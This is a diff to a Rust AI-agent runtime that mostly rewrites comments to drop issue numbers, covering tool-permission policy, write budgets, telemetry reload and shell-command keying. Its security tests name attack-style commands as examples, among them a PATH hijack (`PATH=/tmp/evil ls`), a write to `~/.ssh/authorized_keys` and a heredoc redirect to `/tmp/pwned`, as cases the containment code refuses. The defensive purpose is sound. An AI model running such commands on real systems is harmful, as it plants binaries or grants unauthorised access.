+    /// at its first approval prompt with nobody there to answer, and parks the
+    /// parent behind it for good.
     #[tokio::test]
     async fn spawn_hands_the_parents_unattended_setting_to_the_child() {
         for unattended in [false, true] {
@@ -722,7 +721,7 @@ task = { kind = "pinned", max_tokens = 1000 }
 
     /// A run's `--model` covers the children it spawns as well. The child is
     /// named by the model at run time, so it is part of this run rather than a
-    /// separate one - and dropping the override there was silent (issue #534).
+    /// separate one, and dropping the override there is silent.
     #[tokio::test]
     async fn spawn_hands_the_parents_model_override_to_the_child() {
         let bp = temp_blueprint();
@@ -807,9 +806,9 @@ task = { kind = "pinned", max_tokens = 1000 }
     /// `wait_for_agent` waits off the tool lane.
     ///
     /// The child's own tool batches queue on that lane. A parent that kept lane
-    /// capacity for the length of the wait was holding exactly what the child
-    /// needed in order to finish, so a factory of parents waiting on children
-    /// wedged itself and stayed wedged (issue #191).
+    /// capacity for the length of the wait would hold exactly what the child
+    /// needs in order to finish, so a factory of parents waiting on children
+    /// wedges itself and stays wedged.
     #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
     async fn wait_does_not_hold_the_tool_lane() {
         use leviath_runtime::tool_bridge::{ToolJob, ToolLane, ToolLaneStats};

--- a/crates/leviath-cli/src/daemon/telemetry_reload.rs
+++ b/crates/leviath-cli/src/daemon/telemetry_reload.rs
@@ -1,18 +1,16 @@
 //! Rebuilding the telemetry pipeline when `[observability]` changes.
 //!
-//! The sink was built once at daemon startup and installed as the world's
-//! `Telemetry` resource, and for OTLP a `tracing` layer went into the CLI's
-//! reload slot beside it. Both were then fixed for the life of the process, so
-//! turning export on, pointing it at a different collector, or turning it off
-//! again all needed `lev daemon restart` - and the failure mode for the first
-//! one is the worst kind: you set `enabled = true`, start a run to watch it,
-//! and nothing arrives at the collector. Nothing distinguishes that from a
-//! collector that is not listening.
+//! The pipeline has two halves and both are swappable, so turning export on,
+//! pointing it at a different collector, or turning it off again all take
+//! effect on the next run rather than on the next `lev daemon restart`. The
+//! sink is the world's `Telemetry` resource, replaced like any other resource;
+//! the OTLP log bridge lives in a `tracing_subscriber` reload layer, which
+//! `set_otel_layer` fills at boot and this refills (or empties) afterwards.
 //!
-//! Both halves turn out to be swappable. The sink is a world resource like any
-//! other, and the OTLP log bridge already lives in a `tracing_subscriber`
-//! reload layer, which is what `set_otel_layer` fills at boot and what
-//! this refills (or empties) afterwards.
+//! Worth swapping rather than documenting a restart, because a sink stuck at
+//! its boot value fails in the least readable way there is: you set
+//! `enabled = true`, start a run to watch it, and nothing arrives - which looks
+//! exactly like a collector that is not listening.
 //!
 //! What does **not** move is the base subscriber `logging::init` installs
 //! before any config is read: the fmt layer, its stderr writer, and its
@@ -181,8 +179,8 @@ mod tests {
         assert_eq!(sink_ptr(&mut world), after);
     }
 
-    /// The bug: `enabled = true` reached the file, the run went out with the
-    /// no-op sink, and the collector stayed empty.
+    /// `enabled = true` written after boot swaps the sink, so the next run
+    /// reaches the collector rather than the no-op.
     #[test]
     fn turning_export_on_after_boot_swaps_the_sink() {
         let reload = reload();

--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -38,7 +38,7 @@ use crate::tools::resolve_policy;
 /// Everything one agent needs to execute a tool call: the executors, its policy
 /// layers, and its interaction backend. All fields are cheap `Arc`s so a clone is
 /// moved into each `exec_for` closure. The stage-scoped fields
-/// One run's write ceilings and what it has spent of them (issue #252).
+/// One run's write ceilings and what it has spent of them.
 ///
 /// The count is what a *tool call reported writing*, which for a shell redirect
 /// is the target's size measured after the call. That is an approximation in
@@ -467,9 +467,9 @@ async fn execute_tool(state: &AgentToolState, is_builtin: bool, tc: &ToolCall) -
         mark_dirty_on_tool_write(state, tc);
         result
     } else {
-        // Route under the executor lock, call without it: the lock is what
-        // used to serialise every MCP call in a batch behind the slowest
-        // server. The client's own lock keeps calls to one server in order.
+        // Route under the executor lock, call without it: holding it across the
+        // call serialises every MCP call in a batch behind the slowest server.
+        // The client's own lock keeps calls to one server in order.
         let routed = state.mcp.lock().await.route(&tc.name);
         super::seed_tool::mcp_text(match routed {
             Ok((client, original)) => {
@@ -541,8 +541,8 @@ fn script_tool_join_failed(e: tokio::task::JoinError) -> String {
 /// writes would both pass a 10-byte run budget. And charged only here, on
 /// the two paths that queue the call: a write refused by containment, by the
 /// budget itself, by policy, or by the user at the prompt never reaches the
-/// disk and used to be charged all the same, so a denied 8-byte write made
-/// the next allowed one fail on a limit it had never spent.
+/// disk, and charging it anyway would make a denied 8-byte write fail the next
+/// allowed one on a limit it had never spent.
 fn charge_declared(state: &AgentToolState, tc: &ToolCall) {
     if let Some(declared) = crate::tools::declared_write_bytes(&tc.name, &tc.arguments) {
         state.writes.record(declared);
@@ -564,7 +564,7 @@ fn charge_declared(state: &AgentToolState, tc: &ToolCall) {
 /// Every resolution - a pass-1 interaction answer or denial, a pass-2 execution -
 /// is reported through `progress` the moment it lands, not at batch end, so the
 /// run journal keeps each completed call's result even if the daemon dies before
-/// the batch finishes (issue #96).
+/// the batch finishes.
 pub(crate) async fn dispatch_tools(
     state: Arc<AgentToolState>,
     calls: Vec<ToolCall>,
@@ -622,7 +622,7 @@ pub(crate) async fn dispatch_tools(
         }
 
         // How much this call would add to the run's disk footprint, and whether
-        // there is room for it (issue #252). Checked before the policy layers
+        // there is room for it. Checked before the policy layers
         // for the same reason containment is: a full disk is not a permission
         // question, and no `--yolo` should be able to fill one.
         if let Some(refusal) = crate::tools::write_budget_refusal(
@@ -647,10 +647,10 @@ pub(crate) async fn dispatch_tools(
             .unwrap_or_else(PoisonError::into_inner)
             .clone();
         // Policy is resolved first and unconditionally. Short-circuiting to
-        // `Allow` on a grant, as this used to, skipped `resolve_policy`
-        // entirely - so a grant made in one stage survived into a later stage
-        // that denied the tool, and the "a configured deny is terminal"
-        // guarantee did not hold across a stage boundary.
+        // `Allow` on a grant would skip `resolve_policy` entirely, letting a
+        // grant made in one stage survive into a later stage that denies the
+        // tool - and "a configured deny is terminal" has to hold across a stage
+        // boundary.
         let policy = resolve_policy(
             &tc.name,
             is_builtin,
@@ -684,10 +684,9 @@ pub(crate) async fn dispatch_tools(
 
         match policy {
             ToolPolicy::Deny => {
-                // Says what actually lifts it. The answer used to be "cancel
-                // the run and start it again", because the permission was
-                // resolved once at spawn; now the run re-reads it when it
-                // resumes, and the message has to say the thing that is true.
+                // Says what actually lifts it. The run re-reads its permissions
+                // when it resumes, so the message names an edit plus a resume
+                // rather than a cancel and a fresh run.
                 let result = format!(
                     "[denied] Tool '{}' is not permitted. To allow it, set it to \"allow\" or \
                      \"ask\" under [tool_permissions] in config.toml and resume this run \
@@ -849,7 +848,7 @@ impl ToolService for CliToolService {
         // else. `states` is the process-wide map of *every* agent's tool state,
         // and the work below reaches three more mutexes (including the sandbox
         // manager's); holding the global guard across all of that means one
-        // agent's panic poisons the map every other agent depends on (#109).
+        // agent's panic poisons the map every other agent depends on.
         let Some(state) = self
             .states
             .lock()
@@ -1268,11 +1267,9 @@ mod tests {
         )
     }
 
-    /// The bug, at the seam it lives at: a run parked on a denied tool could
-    /// not be freed by permitting the tool, because the answer was resolved
-    /// once at spawn. Cancelling and re-running was the only way out, and with
-    /// an unanswered prompt waiting for ever (#728) it is the only way out for
-    /// good.
+    /// Permitting a tool frees the run parked on it. Resolving the answer once
+    /// at spawn would leave cancelling and re-running as the only way out, and
+    /// an unanswered prompt waits for ever, so that way out is permanent.
     #[tokio::test]
     async fn a_denied_tool_runs_after_the_permission_is_broadened_and_the_run_resumes() {
         let dir = tempfile::tempdir().unwrap();
@@ -1471,7 +1468,7 @@ mod tests {
         state.reread_config(&Config::default());
     }
 
-    // ── dynamic_tools (issue #97) ──
+    // ── dynamic_tools ──
 
     fn tool_def(name: &str) -> leviath_providers::Tool {
         leviath_providers::Tool {
@@ -1584,7 +1581,7 @@ mod tests {
     /// A `dynamic_tools` agent re-filters its advertised set mid-run. That
     /// refresh has to apply the same unattended cut spawn resolution did, or a
     /// `--yolo` run would quietly get its prompting tools back on the first
-    /// re-scan (issue #204).
+    /// re-scan.
     #[test]
     fn refresh_tools_keeps_the_unattended_cut() {
         let workdir = tempfile::tempdir().unwrap();
@@ -1620,8 +1617,8 @@ mod tests {
     fn a_poisoned_state_map_does_not_wedge_every_other_agent() {
         // `states` holds *every* agent's tool state. A panic while holding it
         // poisons it, and a bare `.lock().unwrap()` then panics for all
-        // agents - one bad agent taking the whole daemon's tool dispatch with it
-        // (issue #109). Recovering the guard keeps the map usable.
+        // agents - one bad agent taking the whole daemon's tool dispatch with
+        // it. Recovering the guard keeps the map usable.
         let svc = CliToolService::new();
         let e = Entity::from_raw_u32(1).expect("a small literal index is always a valid entity id");
         let prev = std::panic::take_hook();
@@ -1842,8 +1839,9 @@ mod tests {
     }
 
     /// With nothing configured, a tool approval waits for a person. The clock
-    /// is paused and advanced past the hour that used to be the default, and
-    /// the prompt is still open; the answer that then arrives runs the call.
+    /// is paused and advanced past an hour - the length a default timeout would
+    /// have imposed - and the prompt is still open; the answer that then
+    /// arrives runs the call.
     #[tokio::test(start_paused = true)]
     async fn an_approval_with_no_timeout_configured_waits_past_the_old_default() {
         let hub = InteractionHub::new();
@@ -2038,7 +2036,7 @@ mod tests {
         // A host function that panics is stopped at the Rhai native-function
         // boundary and surfaced as an ordinary tool error. It must never unwind
         // through the engine: rhai's `ArgBackup` destructor asserts during
-        // unwinding, which double-panics and aborts the whole daemon (#109).
+        // unwinding, which double-panics and aborts the whole daemon.
         struct PanicHost;
         impl leviath_scripting::ScriptHost for PanicHost {
             fn http_get(
@@ -2199,8 +2197,8 @@ mod tests {
         assert_eq!(out[2], ("c3".to_string(), "BBB".to_string()));
     }
 
-    /// Issue #289, at the layer that actually decides. Everything here is
-    /// permitted - `shell` and `write_file` both `Allow`, which is what
+    /// Redirect containment at the layer that actually decides. Everything here
+    /// is permitted - `shell` and `write_file` both `Allow`, which is what
     /// `--yolo` produces - so the only thing that can stop the write is the
     /// containment check, and the control proves it is not stopping everything.
     #[tokio::test]
@@ -2283,7 +2281,7 @@ mod tests {
         assert!(wrote_inside, "{allowed}");
     }
 
-    // ─── Write ceilings (issue #252) ─────────────────────────────────────────
+    // ─── Write ceilings ──────────────────────────────────────────────────────
 
     /// The production constructor, against the machine's real filesystem.
     ///
@@ -2430,9 +2428,9 @@ mod tests {
     }
 
     /// A write the policy denies never touches the disk, so it must not spend
-    /// the run's budget either: it used to be charged its declared size before
-    /// the policy was consulted, and a denied 8-byte write then made the next
-    /// allowed one fail on a "per-run limit" it had never used.
+    /// the run's budget either. Charging the declared size before the policy is
+    /// consulted lets a denied 8-byte write fail the next allowed one on a
+    /// "per-run limit" it had never used.
     #[tokio::test]
     async fn a_denied_write_spends_nothing_of_the_run_budget() {
         let dir = tempfile::tempdir().unwrap();
@@ -2898,10 +2896,10 @@ mod tests {
         assert!(result.contains("[denied]"), "got: {result}");
     }
 
-    /// The hole this closes: a grant used to short-circuit `resolve_policy`
-    /// entirely, so a grant made under one stage survived into a later stage
-    /// that denied the tool - and "a configured deny is terminal" did not hold
-    /// across a stage boundary. Policy is now resolved first and always.
+    /// Policy is resolved first and always. Letting a grant short-circuit
+    /// `resolve_policy` would carry a grant made under one stage into a later
+    /// stage that denies the tool, and "a configured deny is terminal" has to
+    /// hold across a stage boundary.
     #[tokio::test]
     async fn a_grant_does_not_survive_into_a_stage_that_denies() {
         let hub = InteractionHub::new();
@@ -3064,10 +3062,9 @@ mod tests {
         assert!(result.contains("[denied]"), "got: {result}");
     }
 
-    /// The hole this closes: sub-agent calls took an early return that skipped
-    /// `resolve_policy`, so a user's `[tool_permissions] spawn_agent = "deny"`
-    /// was silently ignored and the "a configured deny is terminal" guarantee
-    /// did not cover these five names.
+    /// "A configured deny is terminal" covers the five sub-agent names too. An
+    /// early return past `resolve_policy` for them would silently ignore a
+    /// user's `[tool_permissions] spawn_agent = "deny"`.
     #[tokio::test]
     async fn a_configured_deny_now_covers_the_sub_agent_tools() {
         let hub = InteractionHub::new();
@@ -3300,7 +3297,7 @@ mod tests {
     async fn unattended_run_answers_ask_user_itself_instead_of_opening_a_prompt() {
         // `--yolo` sets `unattended`, so `ask_user_confirm` resolves inline. With
         // a live hub and nobody answering, the attended path would block here
-        // forever - this test finishing at all is the assertion (#107).
+        // forever - this test finishing at all is the assertion.
         let hub = InteractionHub::new();
         let mut state =
             (*state_with(&hub, leviath_mcp::ToolExecutor::new(), HashMap::new())).clone();
@@ -3356,7 +3353,7 @@ mod tests {
         assert!(out[0].1.contains("User declined"));
     }
 
-    // ── per-call progress reporting (#96) ──
+    // ── per-call progress reporting ──
 
     /// The shared log a recording [`ToolProgress`] writes to.
     type ProgressLog = Arc<StdMutex<Vec<(String, String)>>>;

--- a/crates/leviath-cli/src/lint/checks.rs
+++ b/crates/leviath-cli/src/lint/checks.rs
@@ -338,11 +338,10 @@ pub(super) fn lint_output_stage(stage: &leviath_core::Stage) -> Vec<LintFinding>
 /// A stage transitions along its `Always`/`LlmChoice` edges; an edge whose
 /// target has `max_revisits` stops being followable once the budget is spent.
 /// When EVERY normal edge is like that, a long enough run strands the stage
-/// with nowhere to go - which the engine now reports as a dead-end *error*
-/// (it used to read as `complete`, from the middle of the graph, with the
-/// output stage still pending). Observed live: a wide-researcher bounced
-/// deep_dive → compare until compare's budget ran out, then "completed" with
-/// nothing produced.
+/// with nowhere to go, which the engine reports as a dead-end *error* rather
+/// than as `complete` from the middle of the graph with the output stage still
+/// pending. The live shape: a wide-researcher bouncing deep_dive → compare
+/// until compare's budget runs out, with nothing produced.
 ///
 /// The fix is one un-exhaustible way forward: an edge to a stage without
 /// `max_revisits` (an output/terminal stage usually), or a
@@ -668,12 +667,12 @@ pub(super) fn lint_models(stage: &leviath_core::Stage, env: &LintEnv) -> Vec<Lin
     // needs its provider registered, an open one needs something that serves
     // its model.
     //
-    // That second half used to be unanswerable here. The check had no registry,
-    // so it counted an open entry as reachable on the grounds that the resolver
-    // knew better, and skipped itself entirely on any stage holding one - the
-    // form every bundled blueprint is written in. It now has the resolver's own
-    // answer in `unrouted_models`, so a stage whose every entry names something
-    // this machine cannot run is reported whichever form its entries take.
+    // Answering that second half takes the resolver, which arrives here as
+    // `unrouted_models`. Without it an open entry has to be counted reachable
+    // on the grounds that the resolver knows better, and the check skips itself
+    // on any stage holding one - the form every bundled blueprint is written
+    // in. With it, a stage whose every entry names something this machine
+    // cannot run is reported whichever form its entries take.
     //
     // `unrouted_models` is empty both when nobody asked and when everything
     // routes, and both read as reachable here. That is the safe direction: a
@@ -726,7 +725,7 @@ pub(super) fn lint_models(stage: &leviath_core::Stage, env: &LintEnv) -> Vec<Lin
 /// and means "summarize every region that is not pinned", which includes the
 /// ones holding the run's results. Figures that survive a paraphrase are no
 /// longer figures, and nothing about the blueprint is malformed, so the only
-/// place to say so is here (#369).
+/// place to say so is here.
 ///
 /// Scoped to regions declared `required` rather than every region a bare
 /// compact touches. `required` is the author saying "a stage must populate

--- a/crates/leviath-cli/src/lint/security.rs
+++ b/crates/leviath-cli/src/lint/security.rs
@@ -20,9 +20,8 @@ pub(super) fn lint_tool_policies(
     agent_permissions: &HashMap<String, String>,
 ) -> Vec<LintFinding> {
     // Either spelling counts, because policy resolution accepts either: a stage
-    // granting `bash` is covered by a `shell` permission and the reverse. This
-    // used to warn about the mismatch, back when only the name as called was
-    // looked up and every entry written under an alias was dead.
+    // granting `bash` is covered by a `shell` permission and the reverse. A
+    // mismatch between the two is not worth a warning for that reason.
     let has_policy = |name: &str| {
         leviath_tools::tool_name_spellings(name)
             .any(|n| stage.tool_permissions.contains_key(n) || agent_permissions.contains_key(n))
@@ -276,9 +275,9 @@ pub(super) fn lint_safe_commands(blueprint: &Blueprint, env: &LintEnv) -> Vec<Li
 /// warning for an entry so broad it amounts to "my whole home directory" or
 /// "any absolute path".
 ///
-/// The grant status is the point (issue #209). A declaration is inert on its
-/// own, and before this it took reading the config schema to find that out: the
-/// blueprint validated, the run spawned, and the first out-of-workdir read was
+/// The grant status is the point. A declaration is inert on its own, and
+/// without the status it takes reading the config schema to find that out: the
+/// blueprint validates, the run spawns, and the first out-of-workdir read is
 /// refused with nothing said earlier. When `env` has no answer - the daemon's
 /// offline lint, which has no user config to consult - the note falls back to
 /// stating the rule.

--- a/crates/leviath-cli/src/lint/tests.rs
+++ b/crates/leviath-cli/src/lint/tests.rs
@@ -353,10 +353,10 @@ fn an_error_edge_also_satisfies_the_check() {
     assert!(!codes(&lint(&toml, &LintEnv::default())).contains(&"dead-end-possible"));
 }
 
-/// `max_iterations` does **not**, and the message no longer suggests it. It
-/// fires when a stage burns its iteration budget, which is a different event:
-/// on the stranding path `resolve_transition` never consults it, so counting it
-/// would silence the warning without preventing the strand.
+/// `max_iterations` does **not**, and the message must not offer it. It fires
+/// when a stage burns its iteration budget, which is a different event: on the
+/// stranding path `resolve_transition` never consults it, so counting it would
+/// silence the warning without preventing the strand.
 #[test]
 fn a_max_iterations_edge_does_not_satisfy_the_check() {
     let toml = strandable(
@@ -796,10 +796,9 @@ bash = "allow"
 }
 
 /// A permission written under either spelling reaches the tool, so neither is
-/// a mismatch to warn about. It used to be: only the name the model calls was
-/// looked up, so `bash = "ask"` against a stage granting `shell` was dead, and
-/// this check told the author so. Policy resolution now accepts both, and a
-/// warning here would send them to fix something that works.
+/// a mismatch to warn about. Policy resolution looks up both, so `bash = "ask"`
+/// against a stage granting `shell` counts, and a warning here would send the
+/// author off to fix something that works.
 #[test]
 fn either_spelling_of_a_permission_settles_the_shell() {
     for (granted, written) in [("shell", "bash"), ("bash", "shell")] {
@@ -1129,9 +1128,9 @@ max_iterations = 10
 /// the registry, and the answer was that nothing here serves the one model the
 /// stage names.
 ///
-/// This is the shape a typo makes. Before the registry's answer reached this
-/// check, a stage naming a single misspelled model produced no finding at all:
-/// the old test required every entry to pin a provider, and this one pins none.
+/// This is the shape a typo makes, and it takes the registry's answer to see:
+/// the entry pins no provider, so nothing but `unrouted_models` can say the
+/// model is unservable.
 #[test]
 fn an_open_entry_nothing_serves_is_warned_about() {
     let toml = manifest(
@@ -1434,7 +1433,7 @@ fn no_read_paths_means_no_note() {
     );
 }
 
-// ─── read_paths grant status (issue #209) ────────────────────────────────────
+// ─── read_paths grant status ─────────────────────────────────────────────────
 
 /// A blueprint declaring `entries`, plus a `LintEnv` carrying the verdict a
 /// config of `grants` would give. Absolute entries so they compile the same on
@@ -1475,8 +1474,8 @@ fn ungranted_read_paths_are_warned_about_with_the_stanza_to_add() {
     assert!(fix.contains("[agent_read_paths.lint-fixture]"), "{fix}");
 }
 
-/// A partial grant is the case the old spawn warning missed entirely: it only
-/// fired when the grant list was empty.
+/// A partial grant is reported per entry: the granted paths drop out of the
+/// message and the refused ones stay.
 #[test]
 fn a_partial_grant_names_only_what_is_still_refused() {
     let (toml, env) = read_paths_env(&["/data/runs", "glob:/docs/**"], &["/data/runs"]);
@@ -2176,9 +2175,9 @@ fn requiring_an_output_without_the_submit_tool_is_an_error() {
     assert_eq!(missing[0].severity, LintSeverity::Error);
 }
 
-// ─── compact-summarizes-deliverable (#369) ───────────────────────────────────
+// ─── compact-summarizes-deliverable ──────────────────────────────────────────
 
-/// The reported shape: a `required` region and a bare `compact` edge, which
+/// The shape that warns: a `required` region and a bare `compact` edge, which
 /// together mean the stage's own deliverable is paraphrased on the way out.
 #[test]
 fn a_bare_compact_over_a_required_region_is_warned_about() {

--- a/crates/leviath-cli/src/logging.rs
+++ b/crates/leviath-cli/src/logging.rs
@@ -46,8 +46,8 @@ static TUI_HOLDS_TERMINAL: AtomicBool = AtomicBool::new(false);
 static PARKED: Mutex<Vec<u8>> = Mutex::new(Vec::new());
 
 /// The most [`PARKED`] may hold. A long `lev dash` session with `--verbose`
-/// used to accumulate every debug line for the life of the session; past this
-/// the oldest bytes go and the release says how many.
+/// would otherwise hold every debug line for the life of the session; past
+/// this the oldest bytes go and the release says how many.
 const PARKED_CAP: usize = 1024 * 1024;
 
 /// Bytes dropped from [`PARKED`] since the last release, reported on release.

--- a/crates/leviath-cli/src/main.rs
+++ b/crates/leviath-cli/src/main.rs
@@ -320,10 +320,10 @@ async fn real_run(args: commands::run::RunArgs) -> anyhow::Result<()> {
     // directory branch already handles and what the docs have always promised.
     let path = args.path.as_deref().unwrap_or(".");
     let workdir = commands::run::effective_workdir(args.workdir, std::env::current_dir()?)?;
-    // Confirm a workdir an agent probably should not be pointed at (issue
-    // #252). Before resolving the task, so a cancelled run has not opened an
-    // editor first; `--yolo` and any non-terminal caller proceed with a warning
-    // rather than being refused.
+    // Confirm a workdir an agent probably should not be pointed at. Before
+    // resolving the task, so a cancelled run has not opened an editor first;
+    // `--yolo` and any non-terminal caller proceed with a warning rather than
+    // being refused.
     {
         let allowed = leviath_cli::config::Config::load()
             .map(|c| c.security.allowed_workdirs)

--- a/crates/leviath-cli/src/render/mod.rs
+++ b/crates/leviath-cli/src/render/mod.rs
@@ -36,7 +36,8 @@ use crate::tui::theme::{C_ACCENT, C_CODE_BG, C_CODE_FG, C_DIM, C_MUTED, C_SUCCES
 
 /// Convert a markdown string to ratatui `Text` for rendering in a `Paragraph`.
 ///
-/// `width` is used to draw horizontal rules to the correct width.
+/// `width` is what the drawn blocks are laid out to: horizontal rules,
+/// tables, and mermaid diagrams.
 pub(crate) fn markdown_to_text(input: &str, width: u16) -> Text<'static> {
     let mut renderer = Renderer::new(width);
     renderer.render(input);
@@ -118,7 +119,7 @@ struct Renderer {
     /// cell events only arrive between a `Table` start and end, so an "is
     /// there a table" check on each one is a branch nothing can take.
     table: table::TableBuilder,
-    /// Terminal width (used for HR lines).
+    /// Terminal width, which rules, tables and diagrams are drawn to.
     width: u16,
 }
 

--- a/crates/leviath-cli/src/render/tests.rs
+++ b/crates/leviath-cli/src/render/tests.rs
@@ -75,8 +75,8 @@ fn mermaid_block_is_drawn_rather_than_dumped() {
         .iter()
         .flat_map(|l| l.spans.iter().map(|s| s.content.as_ref()))
         .collect::<String>();
-    // It used to print its own source and an errand ("install mmdc"). Now it
-    // is a diagram: the ids are in boxes with an arrow between them.
+    // A drawn diagram, not the block's own source with an "install mmdc"
+    // errand attached: the ids are in boxes with an arrow between them.
     assert!(all.contains('┌'), "{all}");
     assert!(all.contains('▼'), "{all}");
     assert!(!all.contains("mmdc"), "the errand is gone: {all}");
@@ -761,8 +761,8 @@ fn chart(source: &[&str], width: u16) -> Vec<String> {
         .collect()
 }
 
-/// A flowchart used to render as its own source with an errand attached
-/// ("install mmdc"). It is a diagram now: boxes, and arrows between them.
+/// A flowchart is drawn as a diagram - boxes, and arrows between them - not
+/// as its own source with an "install mmdc" errand attached.
 #[test]
 fn a_flowchart_is_drawn_as_boxes_and_arrows() {
     let rows = chart(
@@ -1109,9 +1109,9 @@ fn rows_of(md: &str, width: u16) -> Vec<String> {
         .collect()
 }
 
-/// A table used to arrive as its cells run together on one line. It is now a
-/// framed grid, with the header ruled off and the columns aligned as the
-/// delimiter row asked.
+/// A table is a framed grid rather than its cells run together on one line,
+/// with the header ruled off and the columns aligned as the delimiter row
+/// asked.
 #[test]
 fn a_table_is_drawn_as_a_grid() {
     let md = "| Name | Role |\n|:---|---:|\n| alpha | lead |\n| b | c |\n";

--- a/crates/leviath-cli/src/runstate.rs
+++ b/crates/leviath-cli/src/runstate.rs
@@ -437,8 +437,8 @@ pub(crate) fn read_final_output(run_id: &str) -> Option<leviath_core::FinalOutpu
 
 /// [`read_final_output`] for a run directory the caller already resolved,
 /// with the metadata it already read. The daemon's recovery works from its
-/// configured runs directory rather than the home one, and used to carry a
-/// copy of this for that reason.
+/// configured runs directory rather than the home one, which is what this
+/// entry point is for.
 pub(crate) fn read_final_output_in(
     dir: &std::path::Path,
     meta: &RunMeta,
@@ -1063,8 +1063,8 @@ mod tests {
         ids.iter().map(|s| (*s).to_string()).collect()
     }
 
-    /// The shape issue #202 reported: disk says running, the daemon is not
-    /// hosting it, and it has not moved in a long time.
+    /// The abandoned shape: disk says running, the daemon is not hosting it,
+    /// and it has not moved in a long time.
     #[test]
     fn a_run_nothing_is_driving_looks_abandoned() {
         let meta = live_on_disk("r1");
@@ -1132,8 +1132,8 @@ mod tests {
 
     /// The progress stamp wins over the heartbeat. A wedged run keeps rewriting
     /// `updated_at` every 30 seconds, so judging on it would never age anything
-    /// out, which is the reason issue #202 could not be fixed from meta.json
-    /// before the stamp existed.
+    /// out; the stamp is the only field on meta.json that separates a run that
+    /// is working from one that is only ticking.
     #[test]
     fn a_fresh_heartbeat_does_not_rescue_a_run_that_stopped_moving() {
         let mut meta = live_on_disk("r1");
@@ -2214,7 +2214,8 @@ mod tests {
     /// The journal keeps `callback_secret` (the daemon re-signs webhooks for a
     /// run it reloads), so a replayed point carries it unless the reader strips
     /// it. `GET /api/agents/{id}/context/history` serves these points straight
-    /// out, which handed the webhook signing key to any API token holder.
+    /// out, so an unstripped one hands the webhook signing key to any API token
+    /// holder.
     ///
     /// Asserts against the *archive* as well as the history, so the test still
     /// means something if the journal ever stops storing the secret: were that
@@ -3264,7 +3265,7 @@ mod tests {
 
     /// The spawn that never became a run: the placeholder is `Starting`, which
     /// is not terminal, so it has to be rewritten or it claims to be alive for
-    /// ever (issue #190).
+    /// ever.
     #[test]
     fn force_error_records_the_failure_over_a_starting_placeholder() {
         let base = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/shell_keys.rs
+++ b/crates/leviath-cli/src/shell_keys.rs
@@ -214,9 +214,9 @@ fn classify_write(target: &Word) -> WriteTarget {
 ///
 /// `is_valid_prefix` rejects anything starting with `>`, so there is no
 /// `[safe_commands] shell` entry that covers a write and none can be added. A
-/// write is approved by a person, per target, or not at all - which is what the
-/// safe list's own admission rule ("must not be able to write a file") has
-/// always said and could not previously enforce.
+/// write is approved by a person, per target, or not at all, which is what the
+/// safe list's own admission rule ("must not be able to write a file")
+/// demands.
 fn write_key(path: &str) -> String {
     format!(">{path}")
 }
@@ -368,12 +368,12 @@ pub(crate) enum WriteTargets {
 /// already ungrantable by [`writes_a_file`] and prompts every time, which is
 /// the containment it gets.
 ///
-/// A line that will not tokenize is different, and used to be folded into the
-/// same silence. It was "already treated as writing" by [`writes_a_file`], so
-/// it prompted - but under `--yolo` a prompt is a yes, and `cat <<EOF >
-/// /tmp/pwned` then wrote outside the tree where `write_file` on the same path
-/// is refused. Such a line is now [`WriteTargets::Unreadable`] when it holds a
-/// `>` at all, and the caller refuses it rather than guessing.
+/// A line that will not tokenize is different: it is
+/// [`WriteTargets::Unreadable`] when it holds a `>` at all, and the caller
+/// refuses it rather than guessing. Leaning on the prompt instead is not
+/// containment, because under `--yolo` a prompt is a yes, and `cat <<EOF >
+/// /tmp/pwned` would write outside the tree where `write_file` on the same
+/// path is refused.
 pub(crate) fn write_targets(command: &str) -> WriteTargets {
     let Some(segments) = tokenize(command) else {
         return match command.contains('>') {
@@ -430,8 +430,7 @@ pub(crate) fn program_of(key: &str) -> &str {
 /// A write key is refused on top of that rule rather than by it, because a bare
 /// `>out` *does* derive back to itself and would otherwise become a
 /// pre-approvable write. A write is approved by a person, per target, or not at
-/// all - which is what the safe list's own admission rule has always said and
-/// could not previously enforce.
+/// all, which is what the safe list's own admission rule demands.
 pub(crate) fn is_valid_prefix(entry: &str) -> bool {
     !entry.starts_with('>') && command_keys(entry) == [format!("{KEY_PREFIX}{entry}")]
 }

--- a/crates/leviath-cli/src/shell_keys/tests.rs
+++ b/crates/leviath-cli/src/shell_keys/tests.rs
@@ -92,8 +92,8 @@ fn a_quoted_pipe_is_not_a_command_boundary() {
 
 // ─── Prompt-count regressions ────────────────────────────────────────────────
 
-/// Loop and conditional keywords are not programs. They produced `shell:for i`
-/// and `shell:do if` on a real run.
+/// Loop and conditional keywords are not programs. Read as one, `for` and `do`
+/// key `shell:for i` and `shell:do if`.
 #[test]
 fn loop_keywords_are_not_programs() {
     assert_eq!(
@@ -122,9 +122,9 @@ fn cd_is_keyed_without_its_path() {
 /// An environment assignment is not the program being run - but it is named,
 /// because it decides which program the rest of the line resolves to.
 ///
-/// This test used to assert that an assignment contributed nothing at all,
-/// which is the bug: `PATH=/tmp/evil ls` keyed a bare `shell:ls`, and `ls` is
-/// on the default safe list, so it ran somebody else's binary with no prompt.
+/// Dropping it is the hole: `PATH=/tmp/evil ls` would key a bare `shell:ls`,
+/// and `ls` is on the default safe list, so somebody else's binary runs with
+/// no prompt.
 #[test]
 fn an_env_assignment_is_not_the_program() {
     assert_eq!(
@@ -143,7 +143,7 @@ fn a_subshell_paren_is_a_boundary() {
     );
 }
 
-// ─── Behaviour carried over from the previous implementation ─────────────────
+// ─── What a key covers ───────────────────────────────────────────────────────
 
 #[test]
 fn a_subcommand_narrows_the_grant() {
@@ -208,10 +208,9 @@ fn a_substituted_command_gets_its_own_key() {
 
 /// A redirect target is not a command - it is a write, which is its own key.
 ///
-/// This test used to assert the target was dropped entirely, which is the bug:
-/// `cat x > ~/.ssh/authorized_keys` keyed a bare `shell:cat x`, and a
-/// `[safe_commands]` entry of `cat` widened onto it, so the shipped default
-/// configuration wrote arbitrary files with no prompt.
+/// Dropping the target is the hole: `cat x > ~/.ssh/authorized_keys` would key
+/// a bare `shell:cat x`, and a `[safe_commands]` entry of `cat` widens onto it,
+/// so the shipped default configuration writes arbitrary files with no prompt.
 #[test]
 fn a_redirect_target_is_a_write_not_a_command() {
     assert_eq!(
@@ -784,7 +783,7 @@ fn an_env_key_is_a_writable_config_entry() {
     assert!(!safe.contains_key(&format!("{KEY_PREFIX}env:PATH")));
 }
 
-// ─── Which shell's escape rule (issue #296) ──────────────────────────────────
+// ─── Which shell's escape rule ───────────────────────────────────────────────
 
